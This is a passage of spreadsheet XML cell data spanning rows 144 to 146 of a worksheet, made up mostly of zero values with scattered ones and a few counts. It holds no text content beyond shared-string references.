      <c r="OK144">
        <v>0</v>
      </c>
      <c r="OL144">
        <v>0</v>
      </c>
      <c r="OM144">
        <v>0</v>
      </c>
      <c r="ON144">
        <v>0</v>
      </c>
      <c r="OO144">
        <v>0</v>
      </c>
      <c r="OP144">
        <v>0</v>
      </c>
      <c r="OQ144">
        <v>0</v>
      </c>
      <c r="OR144">
        <v>0</v>
      </c>
      <c r="OS144">
        <v>0</v>
      </c>
      <c r="OT144">
        <v>0</v>
      </c>
      <c r="OU144">
        <v>0</v>
      </c>
      <c r="OV144">
        <v>0</v>
      </c>
      <c r="OW144">
        <v>0</v>
      </c>
      <c r="OX144">
        <v>0</v>
      </c>
      <c r="OY144">
        <v>0</v>
      </c>
      <c r="OZ144">
        <v>0</v>
      </c>
      <c r="PA144">
        <v>0</v>
      </c>
      <c r="PB144">
        <v>0</v>
      </c>
      <c r="PC144">
        <v>0</v>
      </c>
      <c r="PD144">
        <v>0</v>
      </c>
      <c r="PE144">
        <v>0</v>
      </c>
      <c r="PF144">
        <v>0</v>
      </c>
      <c r="PG144">
        <v>0</v>
      </c>
      <c r="PH144">
        <v>0</v>
      </c>
      <c r="PI144">
        <v>0</v>
      </c>
      <c r="PJ144">
        <v>0</v>
      </c>
      <c r="PK144">
        <v>0</v>
      </c>
      <c r="PL144">
        <v>0</v>
      </c>
      <c r="PM144">
        <v>0</v>
      </c>
      <c r="PN144">
        <v>0</v>
      </c>
      <c r="PO144">
        <v>0</v>
      </c>
      <c r="PP144">
        <v>0</v>
      </c>
      <c r="PQ144">
        <v>0</v>
      </c>
      <c r="PR144">
        <v>0</v>
      </c>
      <c r="PS144">
        <v>0</v>
      </c>
      <c r="PT144">
        <v>0</v>
      </c>
      <c r="PU144">
        <v>0</v>
      </c>
      <c r="PV144">
        <v>0</v>
      </c>
      <c r="PW144">
        <v>0</v>
      </c>
      <c r="PX144">
        <v>0</v>
      </c>
      <c r="PY144">
        <v>0</v>
      </c>
      <c r="PZ144">
        <v>0</v>
      </c>
      <c r="QA144">
        <v>1</v>
      </c>
      <c r="QB144">
        <v>0</v>
      </c>
      <c r="QC144">
        <v>0</v>
      </c>
      <c r="QD144">
        <v>0</v>
      </c>
      <c r="QE144">
        <v>0</v>
      </c>
      <c r="QF144">
        <v>0</v>
      </c>
      <c r="QG144">
        <v>0</v>
      </c>
      <c r="QH144">
        <v>0</v>
      </c>
      <c r="QI144">
        <v>0</v>
      </c>
      <c r="QJ144">
        <v>0</v>
      </c>
      <c r="QK144">
        <v>0</v>
      </c>
      <c r="QL144">
        <v>0</v>
      </c>
      <c r="QM144">
        <v>0</v>
      </c>
      <c r="QN144">
        <v>0</v>
      </c>
      <c r="QO144">
        <v>0</v>
      </c>
      <c r="QP144">
        <v>0</v>
      </c>
      <c r="QQ144">
        <v>0</v>
      </c>
      <c r="QR144">
        <v>0</v>
      </c>
      <c r="QS144">
        <v>0</v>
      </c>
      <c r="QT144">
        <v>0</v>
      </c>
      <c r="QU144">
        <v>0</v>
      </c>
      <c r="QV144">
        <v>0</v>
      </c>
      <c r="QW144">
        <v>0</v>
      </c>
      <c r="QX144">
        <v>0</v>
      </c>
      <c r="QY144">
        <v>0</v>
      </c>
      <c r="QZ144">
        <v>0</v>
      </c>
      <c r="RA144">
        <v>0</v>
      </c>
      <c r="RB144">
        <v>0</v>
      </c>
      <c r="RC144">
        <v>0</v>
      </c>
      <c r="RD144">
        <v>0</v>
      </c>
      <c r="RE144">
        <v>0</v>
      </c>
      <c r="RF144">
        <v>0</v>
      </c>
      <c r="RG144">
        <v>0</v>
      </c>
      <c r="RH144">
        <v>0</v>
      </c>
      <c r="RI144">
        <v>0</v>
      </c>
      <c r="RJ144">
        <v>0</v>
      </c>
      <c r="RK144">
        <v>0</v>
      </c>
      <c r="RL144">
        <v>0</v>
      </c>
      <c r="RM144">
        <v>0</v>
      </c>
      <c r="RN144">
        <v>0</v>
      </c>
      <c r="RO144">
        <v>0</v>
      </c>
      <c r="RP144">
        <v>0</v>
      </c>
      <c r="RQ144">
        <v>0</v>
      </c>
      <c r="RR144">
        <v>0</v>
      </c>
      <c r="RS144">
        <v>0</v>
      </c>
      <c r="RT144">
        <v>0</v>
      </c>
      <c r="RU144">
        <v>0</v>
      </c>
      <c r="RV144">
        <v>0</v>
      </c>
      <c r="RW144">
        <v>0</v>
      </c>
      <c r="RX144">
        <v>0</v>
      </c>
      <c r="RY144">
        <v>0</v>
      </c>
      <c r="RZ144">
        <v>0</v>
      </c>
      <c r="SA144">
        <v>0</v>
      </c>
    </row>
    <row r="145" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A145" s="6" t="s">
        <v>4197</v>
      </c>
      <c r="B145">
        <v>10</v>
      </c>
      <c r="C145">
        <v>0</v>
      </c>
      <c r="D145">
        <v>0</v>
      </c>
      <c r="E145">
        <v>0</v>
      </c>
      <c r="F145">
        <v>0</v>
      </c>
      <c r="G145">
        <v>0</v>
      </c>
      <c r="H145">
        <v>0</v>
      </c>
      <c r="I145">
        <v>0</v>
      </c>
      <c r="J145">
        <v>0</v>
      </c>
      <c r="K145">
        <v>0</v>
      </c>
      <c r="L145">
        <v>0</v>
      </c>
      <c r="M145">
        <v>0</v>
      </c>
      <c r="N145">
        <v>0</v>
      </c>
      <c r="O145">
        <v>0</v>
      </c>
      <c r="P145">
        <v>0</v>
      </c>
      <c r="Q145">
        <v>0</v>
      </c>
      <c r="R145">
        <v>0</v>
      </c>
      <c r="S145">
        <v>0</v>
      </c>
      <c r="T145">
        <v>0</v>
      </c>
      <c r="U145">
        <v>0</v>
      </c>
      <c r="V145">
        <v>0</v>
      </c>
      <c r="W145">
        <v>0</v>
      </c>
      <c r="X145">
        <v>0</v>
      </c>
      <c r="Y145">
        <v>0</v>
      </c>
      <c r="Z145">
        <v>0</v>
      </c>
      <c r="AA145">
        <v>0</v>
      </c>
      <c r="AB145">
        <v>0</v>
      </c>
      <c r="AC145">
        <v>0</v>
      </c>
      <c r="AD145">
        <v>0</v>
      </c>
      <c r="AE145">
        <v>0</v>
      </c>
      <c r="AF145">
        <v>0</v>
      </c>
      <c r="AG145">
        <v>0</v>
      </c>
      <c r="AH145">
        <v>0</v>
      </c>
      <c r="AI145">
        <v>0</v>
      </c>
      <c r="AJ145">
        <v>0</v>
      </c>
      <c r="AK145">
        <v>0</v>
      </c>
      <c r="AL145">
        <v>0</v>
      </c>
      <c r="AM145">
        <v>0</v>
      </c>
      <c r="AN145">
        <v>0</v>
      </c>
      <c r="AO145">
        <v>0</v>
      </c>
      <c r="AP145">
        <v>0</v>
      </c>
      <c r="AQ145">
        <v>0</v>
      </c>
      <c r="AR145">
        <v>0</v>
      </c>
      <c r="AS145">
        <v>0</v>
      </c>
      <c r="AT145">
        <v>0</v>
      </c>
      <c r="AU145">
        <v>0</v>
      </c>
      <c r="AV145">
        <v>0</v>
      </c>
      <c r="AW145">
        <v>0</v>
      </c>
      <c r="AX145">
        <v>0</v>
      </c>
      <c r="AY145">
        <v>0</v>
      </c>
      <c r="AZ145">
        <v>0</v>
      </c>
      <c r="BA145">
        <v>0</v>
      </c>
      <c r="BB145">
        <v>0</v>
      </c>
      <c r="BC145">
        <v>0</v>
      </c>
      <c r="BD145">
        <v>0</v>
      </c>
      <c r="BE145">
        <v>0</v>
      </c>
      <c r="BF145">
        <v>0</v>
      </c>
      <c r="BG145">
        <v>0</v>
      </c>
      <c r="BH145">
        <v>0</v>
      </c>
      <c r="BI145">
        <v>0</v>
      </c>
      <c r="BJ145">
        <v>0</v>
      </c>
      <c r="BK145">
        <v>0</v>
      </c>
      <c r="BL145">
        <v>0</v>
      </c>
      <c r="BM145">
        <v>0</v>
      </c>
      <c r="BN145">
        <v>1</v>
      </c>
      <c r="BO145">
        <v>0</v>
      </c>
      <c r="BP145">
        <v>0</v>
      </c>
      <c r="BQ145">
        <v>0</v>
      </c>
      <c r="BR145">
        <v>0</v>
      </c>
      <c r="BS145">
        <v>0</v>
      </c>
      <c r="BT145">
        <v>0</v>
      </c>
      <c r="BU145">
        <v>0</v>
      </c>
      <c r="BV145">
        <v>0</v>
      </c>
      <c r="BW145">
        <v>0</v>
      </c>
      <c r="BX145">
        <v>0</v>
      </c>
      <c r="BY145">
        <v>0</v>
      </c>
      <c r="BZ145">
        <v>0</v>
      </c>
      <c r="CA145">
        <v>0</v>
      </c>
      <c r="CB145">
        <v>0</v>
      </c>
      <c r="CC145">
        <v>0</v>
      </c>
      <c r="CD145">
        <v>0</v>
      </c>
      <c r="CE145">
        <v>0</v>
      </c>
      <c r="CF145">
        <v>0</v>
      </c>
      <c r="CG145">
        <v>0</v>
      </c>
      <c r="CH145">
        <v>0</v>
      </c>
      <c r="CI145">
        <v>0</v>
      </c>
      <c r="CJ145">
        <v>0</v>
      </c>
      <c r="CK145">
        <v>0</v>
      </c>
      <c r="CL145">
        <v>0</v>
      </c>
      <c r="CM145">
        <v>0</v>
      </c>
      <c r="CN145">
        <v>0</v>
      </c>
      <c r="CO145">
        <v>0</v>
      </c>
      <c r="CP145">
        <v>0</v>
      </c>
      <c r="CQ145">
        <v>0</v>
      </c>
      <c r="CR145">
        <v>0</v>
      </c>
      <c r="CS145">
        <v>0</v>
      </c>
      <c r="CT145">
        <v>0</v>
      </c>
      <c r="CU145">
        <v>0</v>
      </c>
      <c r="CV145">
        <v>0</v>
      </c>
      <c r="CW145">
        <v>0</v>
      </c>
      <c r="CX145">
        <v>0</v>
      </c>
      <c r="CY145">
        <v>0</v>
      </c>
      <c r="CZ145">
        <v>0</v>
      </c>
      <c r="DA145">
        <v>0</v>
      </c>
      <c r="DB145">
        <v>0</v>
      </c>
      <c r="DC145">
        <v>0</v>
      </c>
      <c r="DD145">
        <v>0</v>
      </c>
      <c r="DE145">
        <v>0</v>
      </c>
      <c r="DF145">
        <v>0</v>
      </c>
      <c r="DG145">
        <v>0</v>
      </c>
      <c r="DH145">
        <v>0</v>
      </c>
      <c r="DI145">
        <v>0</v>
      </c>
      <c r="DJ145">
        <v>0</v>
      </c>
      <c r="DK145">
        <v>0</v>
      </c>
      <c r="DL145">
        <v>0</v>
      </c>
      <c r="DM145">
        <v>0</v>
      </c>
      <c r="DN145">
        <v>0</v>
      </c>
      <c r="DO145">
        <v>1</v>
      </c>
      <c r="DP145">
        <v>0</v>
      </c>
      <c r="DQ145">
        <v>0</v>
      </c>
      <c r="DR145">
        <v>0</v>
      </c>
      <c r="DS145">
        <v>0</v>
      </c>
      <c r="DT145">
        <v>0</v>
      </c>
      <c r="DU145">
        <v>0</v>
      </c>
      <c r="DV145">
        <v>0</v>
      </c>
      <c r="DW145">
        <v>0</v>
      </c>
      <c r="DX145">
        <v>0</v>
      </c>
      <c r="DY145">
        <v>0</v>
      </c>
      <c r="DZ145">
        <v>0</v>
      </c>
      <c r="EA145">
        <v>0</v>
      </c>
      <c r="EB145">
        <v>0</v>
      </c>
      <c r="EC145">
        <v>0</v>
      </c>
      <c r="ED145">
        <v>0</v>
      </c>
      <c r="EE145">
        <v>0</v>
      </c>
      <c r="EF145">
        <v>1</v>
      </c>
      <c r="EG145">
        <v>0</v>
      </c>
      <c r="EH145">
        <v>0</v>
      </c>
      <c r="EI145">
        <v>0</v>
      </c>
      <c r="EJ145">
        <v>0</v>
      </c>
      <c r="EK145">
        <v>0</v>
      </c>
      <c r="EL145">
        <v>0</v>
      </c>
      <c r="EM145">
        <v>0</v>
      </c>
      <c r="EN145">
        <v>0</v>
      </c>
      <c r="EO145">
        <v>0</v>
      </c>
      <c r="EP145">
        <v>0</v>
      </c>
      <c r="EQ145">
        <v>0</v>
      </c>
      <c r="ER145">
        <v>0</v>
      </c>
      <c r="ES145">
        <v>0</v>
      </c>
      <c r="ET145">
        <v>0</v>
      </c>
      <c r="EU145">
        <v>0</v>
      </c>
      <c r="EV145">
        <v>0</v>
      </c>
      <c r="EW145">
        <v>0</v>
      </c>
      <c r="EX145">
        <v>0</v>
      </c>
      <c r="EY145">
        <v>0</v>
      </c>
      <c r="EZ145">
        <v>0</v>
      </c>
      <c r="FA145">
        <v>0</v>
      </c>
      <c r="FB145">
        <v>0</v>
      </c>
      <c r="FC145">
        <v>0</v>
      </c>
      <c r="FD145">
        <v>0</v>
      </c>
      <c r="FE145">
        <v>0</v>
      </c>
      <c r="FF145">
        <v>0</v>
      </c>
      <c r="FG145">
        <v>0</v>
      </c>
      <c r="FH145">
        <v>0</v>
      </c>
      <c r="FI145">
        <v>0</v>
      </c>
      <c r="FJ145">
        <v>0</v>
      </c>
      <c r="FK145">
        <v>0</v>
      </c>
      <c r="FL145">
        <v>0</v>
      </c>
      <c r="FM145">
        <v>0</v>
      </c>
      <c r="FN145">
        <v>0</v>
      </c>
      <c r="FO145">
        <v>0</v>
      </c>
      <c r="FP145">
        <v>0</v>
      </c>
      <c r="FQ145">
        <v>0</v>
      </c>
      <c r="FR145">
        <v>0</v>
      </c>
      <c r="FS145">
        <v>0</v>
      </c>
      <c r="FT145">
        <v>0</v>
      </c>
      <c r="FU145">
        <v>0</v>
      </c>
      <c r="FV145">
        <v>0</v>
      </c>
      <c r="FW145">
        <v>0</v>
      </c>
      <c r="FX145">
        <v>0</v>
      </c>
      <c r="FY145">
        <v>0</v>
      </c>
      <c r="FZ145">
        <v>0</v>
      </c>
      <c r="GA145">
        <v>0</v>
      </c>
      <c r="GB145">
        <v>0</v>
      </c>
      <c r="GC145">
        <v>0</v>
      </c>
      <c r="GD145">
        <v>0</v>
      </c>
      <c r="GE145">
        <v>0</v>
      </c>
      <c r="GF145">
        <v>0</v>
      </c>
      <c r="GG145">
        <v>0</v>
      </c>
      <c r="GH145">
        <v>0</v>
      </c>
      <c r="GI145">
        <v>0</v>
      </c>
      <c r="GJ145">
        <v>0</v>
      </c>
      <c r="GK145">
        <v>0</v>
      </c>
      <c r="GL145">
        <v>0</v>
      </c>
      <c r="GM145">
        <v>0</v>
      </c>
      <c r="GN145">
        <v>0</v>
      </c>
      <c r="GO145">
        <v>0</v>
      </c>
      <c r="GP145">
        <v>0</v>
      </c>
      <c r="GQ145">
        <v>0</v>
      </c>
      <c r="GR145">
        <v>0</v>
      </c>
      <c r="GS145">
        <v>0</v>
      </c>
      <c r="GT145">
        <v>0</v>
      </c>
      <c r="GU145">
        <v>0</v>
      </c>
      <c r="GV145">
        <v>0</v>
      </c>
      <c r="GW145">
        <v>0</v>
      </c>
      <c r="GX145">
        <v>0</v>
      </c>
      <c r="GY145">
        <v>0</v>
      </c>
      <c r="GZ145">
        <v>0</v>
      </c>
      <c r="HA145">
        <v>0</v>
      </c>
      <c r="HB145">
        <v>0</v>
      </c>
      <c r="HC145">
        <v>0</v>
      </c>
      <c r="HD145">
        <v>0</v>
      </c>
      <c r="HE145">
        <v>0</v>
      </c>
      <c r="HF145">
        <v>0</v>
      </c>
      <c r="HG145">
        <v>0</v>
      </c>
      <c r="HH145">
        <v>0</v>
      </c>
      <c r="HI145">
        <v>0</v>
      </c>
      <c r="HJ145">
        <v>0</v>
      </c>
      <c r="HK145">
        <v>0</v>
      </c>
      <c r="HL145">
        <v>0</v>
      </c>
      <c r="HM145">
        <v>0</v>
      </c>
      <c r="HN145">
        <v>0</v>
      </c>
      <c r="HO145">
        <v>0</v>
      </c>
      <c r="HP145">
        <v>0</v>
      </c>
      <c r="HQ145">
        <v>0</v>
      </c>
      <c r="HR145">
        <v>0</v>
      </c>
      <c r="HS145">
        <v>0</v>
      </c>
      <c r="HT145">
        <v>0</v>
      </c>
      <c r="HU145">
        <v>0</v>
      </c>
      <c r="HV145">
        <v>0</v>
      </c>
      <c r="HW145">
        <v>0</v>
      </c>
      <c r="HX145">
        <v>0</v>
      </c>
      <c r="HY145">
        <v>0</v>
      </c>
      <c r="HZ145">
        <v>0</v>
      </c>
      <c r="IA145">
        <v>0</v>
      </c>
      <c r="IB145">
        <v>0</v>
      </c>
      <c r="IC145">
        <v>0</v>
      </c>
      <c r="ID145">
        <v>0</v>
      </c>
      <c r="IE145">
        <v>0</v>
      </c>
      <c r="IF145">
        <v>0</v>
      </c>
      <c r="IG145">
        <v>0</v>
      </c>
      <c r="IH145">
        <v>0</v>
      </c>
      <c r="II145">
        <v>0</v>
      </c>
      <c r="IJ145">
        <v>0</v>
      </c>
      <c r="IK145">
        <v>0</v>
      </c>
      <c r="IL145">
        <v>0</v>
      </c>
      <c r="IM145">
        <v>0</v>
      </c>
      <c r="IN145">
        <v>0</v>
      </c>
      <c r="IO145">
        <v>0</v>
      </c>
      <c r="IP145">
        <v>0</v>
      </c>
      <c r="IQ145">
        <v>0</v>
      </c>
      <c r="IR145">
        <v>0</v>
      </c>
      <c r="IS145">
        <v>0</v>
      </c>
      <c r="IT145">
        <v>0</v>
      </c>
      <c r="IU145">
        <v>0</v>
      </c>
      <c r="IV145">
        <v>1</v>
      </c>
      <c r="IW145">
        <v>0</v>
      </c>
      <c r="IX145">
        <v>0</v>
      </c>
      <c r="IY145">
        <v>0</v>
      </c>
      <c r="IZ145">
        <v>0</v>
      </c>
      <c r="JA145">
        <v>0</v>
      </c>
      <c r="JB145">
        <v>0</v>
      </c>
      <c r="JC145">
        <v>0</v>
      </c>
      <c r="JD145">
        <v>0</v>
      </c>
      <c r="JE145">
        <v>0</v>
      </c>
      <c r="JF145">
        <v>0</v>
      </c>
      <c r="JG145">
        <v>0</v>
      </c>
      <c r="JH145">
        <v>0</v>
      </c>
      <c r="JI145">
        <v>0</v>
      </c>
      <c r="JJ145">
        <v>0</v>
      </c>
      <c r="JK145">
        <v>0</v>
      </c>
      <c r="JL145">
        <v>0</v>
      </c>
      <c r="JM145">
        <v>0</v>
      </c>
      <c r="JN145">
        <v>0</v>
      </c>
      <c r="JO145">
        <v>0</v>
      </c>
      <c r="JP145">
        <v>0</v>
      </c>
      <c r="JQ145">
        <v>0</v>
      </c>
      <c r="JR145">
        <v>0</v>
      </c>
      <c r="JS145">
        <v>0</v>
      </c>
      <c r="JT145">
        <v>0</v>
      </c>
      <c r="JU145">
        <v>0</v>
      </c>
      <c r="JV145">
        <v>0</v>
      </c>
      <c r="JW145">
        <v>0</v>
      </c>
      <c r="JX145">
        <v>0</v>
      </c>
      <c r="JY145">
        <v>0</v>
      </c>
      <c r="JZ145">
        <v>0</v>
      </c>
      <c r="KA145">
        <v>0</v>
      </c>
      <c r="KB145">
        <v>0</v>
      </c>
      <c r="KC145">
        <v>0</v>
      </c>
      <c r="KD145">
        <v>0</v>
      </c>
      <c r="KE145">
        <v>0</v>
      </c>
      <c r="KF145">
        <v>0</v>
      </c>
      <c r="KG145">
        <v>0</v>
      </c>
      <c r="KH145">
        <v>0</v>
      </c>
      <c r="KI145">
        <v>0</v>
      </c>
      <c r="KJ145">
        <v>0</v>
      </c>
      <c r="KK145">
        <v>0</v>
      </c>
      <c r="KL145">
        <v>0</v>
      </c>
      <c r="KM145">
        <v>0</v>
      </c>
      <c r="KN145">
        <v>0</v>
      </c>
      <c r="KO145">
        <v>0</v>
      </c>
      <c r="KP145">
        <v>0</v>
      </c>
      <c r="KQ145">
        <v>0</v>
      </c>
      <c r="KR145">
        <v>0</v>
      </c>
      <c r="KS145">
        <v>0</v>
      </c>
      <c r="KT145">
        <v>0</v>
      </c>
      <c r="KU145">
        <v>0</v>
      </c>
      <c r="KV145">
        <v>0</v>
      </c>
      <c r="KW145">
        <v>0</v>
      </c>
      <c r="KX145">
        <v>0</v>
      </c>
      <c r="KY145">
        <v>0</v>
      </c>
      <c r="KZ145">
        <v>0</v>
      </c>
      <c r="LA145">
        <v>0</v>
      </c>
      <c r="LB145">
        <v>0</v>
      </c>
      <c r="LC145">
        <v>0</v>
      </c>
      <c r="LD145">
        <v>0</v>
      </c>
      <c r="LE145">
        <v>0</v>
      </c>
      <c r="LF145">
        <v>0</v>
      </c>
      <c r="LG145">
        <v>0</v>
      </c>
      <c r="LH145">
        <v>0</v>
      </c>
      <c r="LI145">
        <v>0</v>
      </c>
      <c r="LJ145">
        <v>0</v>
      </c>
      <c r="LK145">
        <v>0</v>
      </c>
      <c r="LL145">
        <v>0</v>
      </c>
      <c r="LM145">
        <v>0</v>
      </c>
      <c r="LN145">
        <v>0</v>
      </c>
      <c r="LO145">
        <v>0</v>
      </c>
      <c r="LP145">
        <v>0</v>
      </c>
      <c r="LQ145">
        <v>1</v>
      </c>
      <c r="LR145">
        <v>0</v>
      </c>
      <c r="LS145">
        <v>0</v>
      </c>
      <c r="LT145">
        <v>0</v>
      </c>
      <c r="LU145">
        <v>0</v>
      </c>
      <c r="LV145">
        <v>0</v>
      </c>
      <c r="LW145">
        <v>0</v>
      </c>
      <c r="LX145">
        <v>0</v>
      </c>
      <c r="LY145">
        <v>0</v>
      </c>
      <c r="LZ145">
        <v>0</v>
      </c>
      <c r="MA145">
        <v>0</v>
      </c>
      <c r="MB145">
        <v>0</v>
      </c>
      <c r="MC145">
        <v>0</v>
      </c>
      <c r="MD145">
        <v>0</v>
      </c>
      <c r="ME145">
        <v>0</v>
      </c>
      <c r="MF145">
        <v>0</v>
      </c>
      <c r="MG145">
        <v>0</v>
      </c>
      <c r="MH145">
        <v>0</v>
      </c>
      <c r="MI145">
        <v>0</v>
      </c>
      <c r="MJ145">
        <v>0</v>
      </c>
      <c r="MK145">
        <v>0</v>
      </c>
      <c r="ML145">
        <v>0</v>
      </c>
      <c r="MM145">
        <v>0</v>
      </c>
      <c r="MN145">
        <v>0</v>
      </c>
      <c r="MO145">
        <v>0</v>
      </c>
      <c r="MP145">
        <v>0</v>
      </c>
      <c r="MQ145">
        <v>0</v>
      </c>
      <c r="MR145">
        <v>0</v>
      </c>
      <c r="MS145">
        <v>0</v>
      </c>
      <c r="MT145">
        <v>0</v>
      </c>
      <c r="MU145">
        <v>0</v>
      </c>
      <c r="MV145">
        <v>0</v>
      </c>
      <c r="MW145">
        <v>0</v>
      </c>
      <c r="MX145">
        <v>0</v>
      </c>
      <c r="MY145">
        <v>0</v>
      </c>
      <c r="MZ145">
        <v>0</v>
      </c>
      <c r="NA145">
        <v>0</v>
      </c>
      <c r="NB145">
        <v>0</v>
      </c>
      <c r="NC145">
        <v>0</v>
      </c>
      <c r="ND145">
        <v>0</v>
      </c>
      <c r="NE145">
        <v>0</v>
      </c>
      <c r="NF145">
        <v>0</v>
      </c>
      <c r="NG145">
        <v>0</v>
      </c>
      <c r="NH145">
        <v>0</v>
      </c>
      <c r="NI145">
        <v>0</v>
      </c>
      <c r="NJ145">
        <v>0</v>
      </c>
      <c r="NK145">
        <v>0</v>
      </c>
      <c r="NL145">
        <v>0</v>
      </c>
      <c r="NM145">
        <v>0</v>
      </c>
      <c r="NN145">
        <v>0</v>
      </c>
      <c r="NO145">
        <v>0</v>
      </c>
      <c r="NP145">
        <v>0</v>
      </c>
      <c r="NQ145">
        <v>0</v>
      </c>
      <c r="NR145">
        <v>0</v>
      </c>
      <c r="NS145">
        <v>0</v>
      </c>
      <c r="NT145">
        <v>0</v>
      </c>
      <c r="NU145">
        <v>0</v>
      </c>
      <c r="NV145">
        <v>0</v>
      </c>
      <c r="NW145">
        <v>0</v>
      </c>
      <c r="NX145">
        <v>0</v>
      </c>
      <c r="NY145">
        <v>0</v>
      </c>
      <c r="NZ145">
        <v>0</v>
      </c>
      <c r="OA145">
        <v>0</v>
      </c>
      <c r="OB145">
        <v>0</v>
      </c>
      <c r="OC145">
        <v>0</v>
      </c>
      <c r="OD145">
        <v>0</v>
      </c>
      <c r="OE145">
        <v>0</v>
      </c>
      <c r="OF145">
        <v>0</v>
      </c>
      <c r="OG145">
        <v>0</v>
      </c>
      <c r="OH145">
        <v>0</v>
      </c>
      <c r="OI145">
        <v>0</v>
      </c>
      <c r="OJ145">
        <v>0</v>
      </c>
      <c r="OK145">
        <v>0</v>
      </c>
      <c r="OL145">
        <v>0</v>
      </c>
      <c r="OM145">
        <v>0</v>
      </c>
      <c r="ON145">
        <v>0</v>
      </c>
      <c r="OO145">
        <v>0</v>
      </c>
      <c r="OP145">
        <v>0</v>
      </c>
      <c r="OQ145">
        <v>0</v>
      </c>
      <c r="OR145">
        <v>0</v>
      </c>
      <c r="OS145">
        <v>0</v>
      </c>
      <c r="OT145">
        <v>0</v>
      </c>
      <c r="OU145">
        <v>0</v>
      </c>
      <c r="OV145">
        <v>0</v>
      </c>
      <c r="OW145">
        <v>0</v>
      </c>
      <c r="OX145">
        <v>0</v>
      </c>
      <c r="OY145">
        <v>0</v>
      </c>
      <c r="OZ145">
        <v>0</v>
      </c>
      <c r="PA145">
        <v>0</v>
      </c>
      <c r="PB145">
        <v>0</v>
      </c>
      <c r="PC145">
        <v>0</v>
      </c>
      <c r="PD145">
        <v>0</v>
      </c>
      <c r="PE145">
        <v>0</v>
      </c>
      <c r="PF145">
        <v>1</v>
      </c>
      <c r="PG145">
        <v>0</v>
      </c>
      <c r="PH145">
        <v>0</v>
      </c>
      <c r="PI145">
        <v>0</v>
      </c>
      <c r="PJ145">
        <v>0</v>
      </c>
      <c r="PK145">
        <v>0</v>
      </c>
      <c r="PL145">
        <v>0</v>
      </c>
      <c r="PM145">
        <v>0</v>
      </c>
      <c r="PN145">
        <v>0</v>
      </c>
      <c r="PO145">
        <v>0</v>
      </c>
      <c r="PP145">
        <v>0</v>
      </c>
      <c r="PQ145">
        <v>0</v>
      </c>
      <c r="PR145">
        <v>1</v>
      </c>
      <c r="PS145">
        <v>0</v>
      </c>
      <c r="PT145">
        <v>0</v>
      </c>
      <c r="PU145">
        <v>0</v>
      </c>
      <c r="PV145">
        <v>0</v>
      </c>
      <c r="PW145">
        <v>0</v>
      </c>
      <c r="PX145">
        <v>0</v>
      </c>
      <c r="PY145">
        <v>0</v>
      </c>
      <c r="PZ145">
        <v>0</v>
      </c>
      <c r="QA145">
        <v>0</v>
      </c>
      <c r="QB145">
        <v>0</v>
      </c>
      <c r="QC145">
        <v>0</v>
      </c>
      <c r="QD145">
        <v>0</v>
      </c>
      <c r="QE145">
        <v>0</v>
      </c>
      <c r="QF145">
        <v>0</v>
      </c>
      <c r="QG145">
        <v>0</v>
      </c>
      <c r="QH145">
        <v>0</v>
      </c>
      <c r="QI145">
        <v>0</v>
      </c>
      <c r="QJ145">
        <v>0</v>
      </c>
      <c r="QK145">
        <v>0</v>
      </c>
      <c r="QL145">
        <v>0</v>
      </c>
      <c r="QM145">
        <v>0</v>
      </c>
      <c r="QN145">
        <v>0</v>
      </c>
      <c r="QO145">
        <v>0</v>
      </c>
      <c r="QP145">
        <v>0</v>
      </c>
      <c r="QQ145">
        <v>0</v>
      </c>
      <c r="QR145">
        <v>0</v>
      </c>
      <c r="QS145">
        <v>1</v>
      </c>
      <c r="QT145">
        <v>0</v>
      </c>
      <c r="QU145">
        <v>0</v>
      </c>
      <c r="QV145">
        <v>1</v>
      </c>
      <c r="QW145">
        <v>1</v>
      </c>
      <c r="QX145">
        <v>0</v>
      </c>
      <c r="QY145">
        <v>0</v>
      </c>
      <c r="QZ145">
        <v>0</v>
      </c>
      <c r="RA145">
        <v>0</v>
      </c>
      <c r="RB145">
        <v>0</v>
      </c>
      <c r="RC145">
        <v>0</v>
      </c>
      <c r="RD145">
        <v>0</v>
      </c>
      <c r="RE145">
        <v>0</v>
      </c>
      <c r="RF145">
        <v>0</v>
      </c>
      <c r="RG145">
        <v>0</v>
      </c>
      <c r="RH145">
        <v>0</v>
      </c>
      <c r="RI145">
        <v>0</v>
      </c>
      <c r="RJ145">
        <v>0</v>
      </c>
      <c r="RK145">
        <v>0</v>
      </c>
      <c r="RL145">
        <v>0</v>
      </c>
      <c r="RM145">
        <v>0</v>
      </c>
      <c r="RN145">
        <v>0</v>
      </c>
      <c r="RO145">
        <v>0</v>
      </c>
      <c r="RP145">
        <v>0</v>
      </c>
      <c r="RQ145">
        <v>0</v>
      </c>
      <c r="RR145">
        <v>0</v>
      </c>
      <c r="RS145">
        <v>0</v>
      </c>
      <c r="RT145">
        <v>0</v>
      </c>
      <c r="RU145">
        <v>0</v>
      </c>
      <c r="RV145">
        <v>0</v>
      </c>
      <c r="RW145">
        <v>0</v>
      </c>
      <c r="RX145">
        <v>0</v>
      </c>
      <c r="RY145">
        <v>0</v>
      </c>
      <c r="RZ145">
        <v>0</v>
      </c>
      <c r="SA145">
        <v>0</v>
      </c>
    </row>
    <row r="146" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A146" s="6" t="s">
        <v>4203</v>
      </c>
      <c r="B146">
        <v>7</v>
      </c>
      <c r="C146">
        <v>0</v>
      </c>
      <c r="D146">
        <v>0</v>
      </c>
      <c r="E146">
        <v>0</v>
      </c>
      <c r="F146">
        <v>0</v>
      </c>
      <c r="G146">
        <v>0</v>
      </c>
      <c r="H146">
        <v>0</v>
      </c>
      <c r="I146">
        <v>0</v>
      </c>
      <c r="J146">
        <v>0</v>
      </c>
      <c r="K146">
        <v>0</v>
      </c>
      <c r="L146">
        <v>0</v>
      </c>
      <c r="M146">
        <v>0</v>
      </c>
      <c r="N146">
        <v>0</v>
      </c>
      <c r="O146">
        <v>0</v>
      </c>
      <c r="P146">
        <v>0</v>
      </c>
      <c r="Q146">
        <v>0</v>
      </c>
      <c r="R146">
        <v>0</v>
      </c>
      <c r="S146">
        <v>0</v>
      </c>
      <c r="T146">
        <v>0</v>
      </c>
      <c r="U146">
        <v>0</v>
      </c>
      <c r="V146">
        <v>0</v>
      </c>
      <c r="W146">
        <v>0</v>
      </c>
      <c r="X146">
        <v>0</v>
      </c>
      <c r="Y146">
        <v>0</v>
      </c>
      <c r="Z146">
        <v>0</v>
      </c>
      <c r="AA146">
        <v>0</v>
      </c>
      <c r="AB146">
        <v>0</v>
      </c>
      <c r="AC146">
        <v>0</v>
      </c>
      <c r="AD146">
        <v>0</v>
      </c>
      <c r="AE146">
